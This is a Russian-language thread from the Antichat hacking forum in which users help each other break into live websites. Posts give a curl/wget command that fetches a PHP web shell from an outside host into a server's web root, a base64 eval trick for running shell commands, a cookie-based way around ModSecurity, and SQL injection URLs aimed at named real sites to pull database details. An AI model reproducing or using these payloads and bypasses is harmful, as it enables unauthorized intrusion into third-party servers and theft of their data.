HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.03.2011, 14:37
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от noviyuser  
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
пробуй курлом

curl http://site.com/shell.php > /var/www/html/shell.php
 
Ответить с цитированием

  #2  
Старый 17.03.2011, 18:40
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

Warning: simplexml_load_file() [function.simplexml-load-file]: I/O warning : failed to load external entity "/home/site.ru/docs/news/news/(тут все что хочу)"

можно как-то читать файлы и т д?
 
Ответить с цитированием

  #3  
Старый 17.03.2011, 19:03
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Не выйдет ничего. Если файл, который ты хочешь прочитать некорректный xml(а он, разумеется, будет некорректным ), то получишь false

http://www.spravkaweb.ru/php/datafun/xml/simplexml/simplexml_load_file
 
Ответить с цитированием

  #4  
Старый 17.03.2011, 20:02
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от noviyuser  
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
Была как-то такая же проблема решилась, так:

eval(base64_decode($_POST[cmd])); =>> cmd = c3lzdGVtKCdscyAtbGEnKTs= system('ls -la');

А ты уверен, кстати, что wget есть? Проверь так: which wget
 
Ответить с цитированием

  #5  
Старый 18.03.2011, 03:47
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ

Цитата:
Сообщение от None  
does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.
Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.
 
Ответить с цитированием

  #6  
Старый 18.03.2011, 05:13
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от noviyuser  
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.
 
Ответить с цитированием

  #7  
Старый 18.03.2011, 05:17
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от Lijzer  
Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.
Судя по всему, тебя режет директива Mod Security SecRequestBodyLimit, которая проверяет, чтобы размер тела запроса не превышал указанного значения.

http://www.ptsecurity.ru/download/modrewrite_search.zip
 
Ответить с цитированием

  #8  
Старый 18.03.2011, 07:19
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Redwood  
Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.
спасибо а можно примерчик?
 
Ответить с цитированием

  #9  
Старый 18.03.2011, 13:52
asql
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами: 8014646

Репутация: -3
По умолчанию

Не могу понять как в этом примере вывести information_schema

http://www.airport.lg.ua/index.php?page=3+or+1+group+by+concat(concat_ws(0x 3a3a3a,version(),user(),database()),floor(rand(0)* 2))having+min(0)--+

и вот еще

http://www.tis.lg.ua/index.php?mod=page&page=-23'/**//*!union*//**//*!select*//**/1,concat_ws(0x3a3a3a,version(),user(),database()), 3,4--'

при выводе information_schema, ошибка

Заранее спс
 
Ответить с цитированием

  #10  
Старый 18.03.2011, 15:30
eclipse
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами: 8103926

Репутация: 85
По умолчанию

Помогите раскрутить!

Цитата:
Сообщение от None  
http://zombie.cloud9crew.com/index.php/component/kunena/advsearch?q=hilfe&catids=1%27
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.